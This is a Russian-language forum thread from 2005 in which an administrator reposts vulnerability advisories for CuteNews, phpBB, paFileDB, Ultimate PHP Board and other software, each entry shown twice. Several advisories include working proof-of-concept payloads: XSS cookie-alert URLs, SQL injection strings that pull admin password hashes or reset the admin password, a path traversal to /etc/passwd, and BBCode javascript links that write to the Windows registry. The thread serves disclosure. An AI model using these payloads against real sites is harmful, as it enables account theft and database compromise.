- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
BugTraq
В этой теме предлагаю размещать описания известных вам уязвимостей. Если вы наткнулись на описание уязвимости, то поделившись этой новостью вы наверняка поможете не одному человеку...
Последний раз редактировалось TOSHIK Пт июн 03, 2005 12:31, всего редактировалось 1 раз.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
XSS и загрузка произвольных файлов в CuteNews
3 июня 2005
Программа: CuteNews все версии
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Удаленный пользователь может произвести XSS нападение и выполнить произвольные команды на целевой системе.
1. Уязвимость существует из-за некорректной обработки данных в некоторых значениях URL. Удаленный пользователь может внедрить произвольный HTML-сценарий и получить файлы cookie, связанные с аутентификацией пользователя. Пример:
http://[target]/index.php?mod=editnews&action=editnews&id=[id]
&source=<script>alert(document.cookie);</script>
2. Авторизованный пользователь может загрузить и выполнить произвольный php-сценарий. Функция переименования изображений не проверяет имя входящего и исходящего файлов, что делает возможным загрузить gif/jpg-файл с комментарием в виде php-кода () с последующей сменой расширения. Кроме того, отсутствие фильтрации символов обхода каталога ("../") делает возможным загрузку злонамеренного файла на каталог выше относительно уязвимого скрипта при наличии соответственных прав доступа
Уязвимость нашел Че Гевара (http://antichat.ru)
URL производителя: cutephp.com
Решение: Способов устранения уязвимости не существует в настоящее время.
Программа: CuteNews все версии
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Удаленный пользователь может произвести XSS нападение и выполнить произвольные команды на целевой системе.
1. Уязвимость существует из-за некорректной обработки данных в некоторых значениях URL. Удаленный пользователь может внедрить произвольный HTML-сценарий и получить файлы cookie, связанные с аутентификацией пользователя. Пример:
http://[target]/index.php?mod=editnews&action=editnews&id=[id]
&source=<script>alert(document.cookie);</script>
2. Авторизованный пользователь может загрузить и выполнить произвольный php-сценарий. Функция переименования изображений не проверяет имя входящего и исходящего файлов, что делает возможным загрузить gif/jpg-файл с комментарием в виде php-кода () с последующей сменой расширения. Кроме того, отсутствие фильтрации символов обхода каталога ("../") делает возможным загрузку злонамеренного файла на каталог выше относительно уязвимого скрипта при наличии соответственных прав доступа
Уязвимость нашел Че Гевара (http://antichat.ru)
URL производителя: cutephp.com
Решение: Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
SQL-инъекция в WordPress
3 июня 2005
Программа: WordPress 1.5 и более ранние версии
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует при обработке входных данных в параметре cat_ID. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
URL производителя: wordpress.org
Решение: Установите последнюю версию (1.5.1.2) с сайта производителя.
Хорошая система. Приятно работает. Плохонько интегрируется правда, но все равно хорошая вещь. Осталось теперь еще отловить в ней все дыры и можно будет пользоваться.
Программа: WordPress 1.5 и более ранние версии
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует при обработке входных данных в параметре cat_ID. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
URL производителя: wordpress.org
Решение: Установите последнюю версию (1.5.1.2) с сайта производителя.
Хорошая система. Приятно работает. Плохонько интегрируется правда, но все равно хорошая вещь. Осталось теперь еще отловить в ней все дыры и можно будет пользоваться.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
6 июня 2005
Межсайтовый скриптинг в при обработке BBCODE URL в phpBB
Программа: phpBB версии до 2.0.15
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
[url=javascript://%0ASh=alert(%22CouCou%22);
window.close();]Alert box with "CouCou"[/url]
[url=javascript://%0ASh=new%20ActiveXObject
(%22WScript.shell%22);Sh.regwrite(%22HKCU
%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou
%22);window.close();]Create registry entry:
HKCU\QQQQQ\qq = "CouCou"[/url]
[url=javascript://%0Awindow.opener.document.body.
innerHTML=window.opener.document.body.innerHTML.
replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27);
window.close();]Modify opener page: Paul -> P.A.U.L[/url]
URL производителя: www.phpbb.com
Решение: Установите последнюю версию (2.0.15) с сайта производителя.
Межсайтовый скриптинг в при обработке BBCODE URL в phpBB
Программа: phpBB версии до 2.0.15
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
[url=javascript://%0ASh=alert(%22CouCou%22);
window.close();]Alert box with "CouCou"[/url]
[url=javascript://%0ASh=new%20ActiveXObject
(%22WScript.shell%22);Sh.regwrite(%22HKCU
%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou
%22);window.close();]Create registry entry:
HKCU\QQQQQ\qq = "CouCou"[/url]
[url=javascript://%0Awindow.opener.document.body.
innerHTML=window.opener.document.body.innerHTML.
replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27);
window.close();]Modify opener page: Paul -> P.A.U.L[/url]
URL производителя: www.phpbb.com
Решение: Установите последнюю версию (2.0.15) с сайта производителя.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
10 июня 2005
SQL-инъекция в Loki Download Manager
Программа: Loki Download Manager 2.0
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует в сценарии '/adm/default.asp' при обработке параметра password и в сценарии 'catinfo.asp' в параметре 'cat'. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
user: anyuser
pass: 'or''='
http://[target]/downmancv/catinfo.asp?cat=' union select
null,null,user,null,null,null,null,null,pass,nul l,null,null,null,null FROM
tblAdm '
Решение: Способов устранения уязвимости не существует в настоящее время.
SQL-инъекция в Loki Download Manager
Программа: Loki Download Manager 2.0
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует в сценарии '/adm/default.asp' при обработке параметра password и в сценарии 'catinfo.asp' в параметре 'cat'. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
user: anyuser
pass: 'or''='
http://[target]/downmancv/catinfo.asp?cat=' union select
null,null,user,null,null,null,null,null,pass,nul l,null,null,null,null FROM
tblAdm '
Решение: Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
10 июня 2005
Отказ в обслуживании в функциях ptrace() и mmap()в ядре Linux
Программа: Linux kernel 2.6
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании системы.
1. Уязвимость существует в функции ptrace() на AMD64 системах в файле 'arch/x86_64/kernel/ptrace.c'. Локальный пользователь может аварийно завершить работу системы.
2. Ошибка в функции mmap() позволяет локальному пользователю создать некорректную карту памяти (memory map) и вызвать отказ в обслуживании.
URL производителя: www.kernel.org
Решение: Установите исправление (2.6.11.11) с сайта производителя.
Отказ в обслуживании в функциях ptrace() и mmap()в ядре Linux
Программа: Linux kernel 2.6
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании системы.
1. Уязвимость существует в функции ptrace() на AMD64 системах в файле 'arch/x86_64/kernel/ptrace.c'. Локальный пользователь может аварийно завершить работу системы.
2. Ошибка в функции mmap() позволяет локальному пользователю создать некорректную карту памяти (memory map) и вызвать отказ в обслуживании.
URL производителя: www.kernel.org
Решение: Установите исправление (2.6.11.11) с сайта производителя.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
17 июня 2005
Множественные уязвимости в paFileDB
Программа: paFileDB 3.1 и более ранние версии
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды в базе данных приложения, просмотреть и выполнить произвольные файлы на системе.
1. SQL-инъекция возможна из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Примеры:
http://[target]/pafiledb.php?action=admin&login=do&formname='%20UNION
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf095 1522d9',
%20admin_email,%20'1'%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
%3E%3E+Log+In+%3C%3C&action=admin&login=do
http://[target]/pafiledb.php?select= -99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
Category+%3C%3C&action=team&tm=category&category= edit&edit=form&menu1=%2F
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit
http://[target]/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_use rname,
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
=%2 Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit
http://[target]/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
query=UPDATE%20pafiledb_ad min%20SET%20admin_password%20=%20MD5%281337%28%
20WHERE%201/*
2. Уязвимость при обработке входных данных в параметре action сценария 'pafiledb.php' позволяет удаленному пользователю просмотреть и выполнить произвольные файлы на целевой системе. Пример:
http://[target]/pafiledb.php?action=../../../../etc/passwd%00&login=do
3. Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://[target]/pafiledb.php?ac tion=viewall&start=20&sortby=name%22
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[target]/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
sc ript%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[target]/pafiledb.php?action=category&id=1&pages=%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
URL производителя: www.phparena.net/pafiledb.php
Решение: Установите последнюю версию с сайта производителя.
Множественные уязвимости в paFileDB
Программа: paFileDB 3.1 и более ранние версии
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды в базе данных приложения, просмотреть и выполнить произвольные файлы на системе.
1. SQL-инъекция возможна из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Примеры:
http://[target]/pafiledb.php?action=admin&login=do&formname='%20UNION
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf095 1522d9',
%20admin_email,%20'1'%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
%3E%3E+Log+In+%3C%3C&action=admin&login=do
http://[target]/pafiledb.php?select= -99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
Category+%3C%3C&action=team&tm=category&category= edit&edit=form&menu1=%2F
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit
http://[target]/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_use rname,
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
=%2 Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit
http://[target]/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
query=UPDATE%20pafiledb_ad min%20SET%20admin_password%20=%20MD5%281337%28%
20WHERE%201/*
2. Уязвимость при обработке входных данных в параметре action сценария 'pafiledb.php' позволяет удаленному пользователю просмотреть и выполнить произвольные файлы на целевой системе. Пример:
http://[target]/pafiledb.php?action=../../../../etc/passwd%00&login=do
3. Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://[target]/pafiledb.php?ac tion=viewall&start=20&sortby=name%22
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[target]/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
sc ript%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[target]/pafiledb.php?action=category&id=1&pages=%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
URL производителя: www.phparena.net/pafiledb.php
Решение: Установите последнюю версию с сайта производителя.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
17 июня 2005
SQL-инъекция в socialMPN
Программа: socialMPN
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и определить установочную директорию приложения на сервере.
Уязвимость существует из-за недостаточной проверки входных данных в нескольких переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения и получить данные об установочной директории приложения на сервере. Пример:
http://[target]/article.php?sid=%27
http://[target]/use r.php?uname='&pass=1&op=login
http://[target]/viewforum.php?forum=43&siteid=%2527
http://[target]/newtopic.php?username='&password=
http://[target]/sections.php? op=listarticles&secid=%27
http://[target]/sections.php?op=listarticles&artid=%2527
http://[target]/index.php?siteid='&op=show&aftersid=380
http://[target]/friend .php?sid=%2527&yname=1&ymail=1
& fname=1&fmail=1&op=SendStory
URL производителя: www.socialmpn.com
Решение: Способов устранения уязвимости не существует в настоящее время.
SQL-инъекция в socialMPN
Программа: socialMPN
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и определить установочную директорию приложения на сервере.
Уязвимость существует из-за недостаточной проверки входных данных в нескольких переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения и получить данные об установочной директории приложения на сервере. Пример:
http://[target]/article.php?sid=%27
http://[target]/use r.php?uname='&pass=1&op=login
http://[target]/viewforum.php?forum=43&siteid=%2527
http://[target]/newtopic.php?username='&password=
http://[target]/sections.php? op=listarticles&secid=%27
http://[target]/sections.php?op=listarticles&artid=%2527
http://[target]/index.php?siteid='&op=show&aftersid=380
http://[target]/friend .php?sid=%2527&yname=1&ymail=1
& fname=1&fmail=1&op=SendStory
URL производителя: www.socialmpn.com
Решение: Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
20 июня 2005
Отказ в обслуживании в SpamAssassin при обработке заголовков сообщения
Программа: SpamAssassin 3.0.1, 3.0.2 и 3.0.3
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.
Удаленный пользователь может послать целевой службе сообщение со специально сформированными заголовками, вследствие чего SpamAssassin понадобится большое количество ресурсов и времени для обработки этого сообщения.
URL производителя: spamassassin.apache.org
Решение: Установите последнюю версию (3.0.4) с сайта производителя.
Отказ в обслуживании в SpamAssassin при обработке заголовков сообщения
Программа: SpamAssassin 3.0.1, 3.0.2 и 3.0.3
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.
Удаленный пользователь может послать целевой службе сообщение со специально сформированными заголовками, вследствие чего SpamAssassin понадобится большое количество ресурсов и времени для обработки этого сообщения.
URL производителя: spamassassin.apache.org
Решение: Установите последнюю версию (3.0.4) с сайта производителя.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
20 июня 2005
Межсайтовый скриптинг в Ultimate PHP Board (UPB)
Программа: Ultimate PHP Board 1.9.6 GOLD и более ранние версии
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке входных данных в различных сценариях. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://[target]/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E
http://[target]/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/newpost.php?id= 1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[ta rget]/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C/script%3E
http://[target]/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/scr ipt%3E
http://[target]/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E
http://[target]/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Удаленный пользователь может также получить потенциально важную информацию о пользователях и узнать установочную директорию приложения. Примеры:
http://[target]/upb/db/users.dat
http://[target]/upb/viewtopic.php?id=0
http://[target]/upb/profile.php?action=get&id=0
http://[target]/upb/newpost.php?t_id=0
URL производителя: www.myupb.com
Решение: Способов устранения уязвимости не существует в настоящее время.
Межсайтовый скриптинг в Ultimate PHP Board (UPB)
Программа: Ultimate PHP Board 1.9.6 GOLD и более ранние версии
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке входных данных в различных сценариях. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://[target]/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E
http://[target]/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/newpost.php?id= 1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[ta rget]/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C/script%3E
http://[target]/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/scr ipt%3E
http://[target]/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E
http://[target]/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Удаленный пользователь может также получить потенциально важную информацию о пользователях и узнать установочную директорию приложения. Примеры:
http://[target]/upb/db/users.dat
http://[target]/upb/viewtopic.php?id=0
http://[target]/upb/profile.php?action=get&id=0
http://[target]/upb/newpost.php?t_id=0
URL производителя: www.myupb.com
Решение: Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
20 июня 2005
SQL-инъекция в Mambo
Программа: Mambo 4.5.2.2 и более ранние версии
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость обнаружена в 'com_contents' в сценарии 'content.php' из-за недостаточной обработки входных данных в параметре 'user_rating'. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
URL производителя: www.mamboserver.com
Решение: Установите последнюю версию (4.5.2.3) с сайта производителя.
SQL-инъекция в Mambo
Программа: Mambo 4.5.2.2 и более ранние версии
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость обнаружена в 'com_contents' в сценарии 'content.php' из-за недостаточной обработки входных данных в параметре 'user_rating'. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
URL производителя: www.mamboserver.com
Решение: Установите последнюю версию (4.5.2.3) с сайта производителя.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
20 июня 2005
Межсайтовый скриптинг и обход ограничений безопасности в браузере Opera
Программа: Opera 8.0 и более ранние версии
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
1. Уязвимость существует при обработке "javascript:" ссылок при открытии нового окна или фрейма. Удаленный пользователь может с помощью специально сформированной ссылки выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
2. Обход ограничений безопасности при обработке объекта XMLHttpRequest позволяет злоумышленнику создать специально сформированную страницу и получить доступ к другим открытым страницам за пределами данного домена. Злоумышленник может изменить содержимое открытых страниц и потенциально получить доступ к важной информации пользователей.
URL производителя: www.opera.com
Решение: Установите последнюю версию (8.01) с сайта производителя.
Межсайтовый скриптинг и обход ограничений безопасности в браузере Opera
Программа: Opera 8.0 и более ранние версии
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
1. Уязвимость существует при обработке "javascript:" ссылок при открытии нового окна или фрейма. Удаленный пользователь может с помощью специально сформированной ссылки выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
2. Обход ограничений безопасности при обработке объекта XMLHttpRequest позволяет злоумышленнику создать специально сформированную страницу и получить доступ к другим открытым страницам за пределами данного домена. Злоумышленник может изменить содержимое открытых страниц и потенциально получить доступ к важной информации пользователей.
URL производителя: www.opera.com
Решение: Установите последнюю версию (8.01) с сайта производителя.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
23 июня 2005
Межсайтовый скриптинг в cPanel
Программа: cPanel 10.2.0-R82 и более ранние версии
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость существует из-за недостаточной фильтрации входных данных в параметре ‘user’ сценария cpsrvd.pl. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
http://[host]:2082/login?user=**
Межсайтовый скриптинг в cPanel
Программа: cPanel 10.2.0-R82 и более ранние версии
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость существует из-за недостаточной фильтрации входных данных в параметре ‘user’ сценария cpsrvd.pl. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
http://[host]:2082/login?user=**
Код: Выделить всё
[/i]
[b]URL производителя:[/b] www.cpanel.net
[b]Решение:[/b] Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
21 июня 2005
Раскрытие информации в RealVNC
Программа: RealVNC 4
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю получить доступ к системной информации.
Удаленный пользователь может создать нулевую сессию к хосту и получить информацию о целевой системе, например версию ОС.
URL производителя: www.realvnc.com
Решение: Способов устранения уязвимости не существует в настоящее время.
Раскрытие информации в RealVNC
Программа: RealVNC 4
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю получить доступ к системной информации.
Удаленный пользователь может создать нулевую сессию к хосту и получить информацию о целевой системе, например версию ОС.
URL производителя: www.realvnc.com
Решение: Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!
- TOSHIK
- Администратор
- Сообщения: 6596
- Зарегистрирован: Пт авг 08, 2003 13:49
- Откуда: Ростов-на-Дону
- Контактная информация:
21 июня 2005
Уязвимость состояния операции в sudo
Программа: sudo 1.3.1 - 1.6.8p8
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Обнаруженная уязвимость позволяет локальному пользователю выполнить произвольные команды на целевой системе.
При некоторых обстоятельствах локальный пользователь может выполнить произвольные команды на системе. Если в файле sudoers содержится запись ‘ALL’ после записи, относящейся к учетной записи злоумышленника, локальный пользователь может выполнить произвольные команды на системе.
URL производителя: www.sudo.ws
Решение: Установите последнюю версию (1.6.8p9) с сайта производителя.
Уязвимость состояния операции в sudo
Программа: sudo 1.3.1 - 1.6.8p8
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Обнаруженная уязвимость позволяет локальному пользователю выполнить произвольные команды на целевой системе.
При некоторых обстоятельствах локальный пользователь может выполнить произвольные команды на системе. Если в файле sudoers содержится запись ‘ALL’ после записи, относящейся к учетной записи злоумышленника, локальный пользователь может выполнить произвольные команды на системе.
URL производителя: www.sudo.ws
Решение: Установите последнюю версию (1.6.8p9) с сайта производителя.
Активисты все еще ищутся здесь!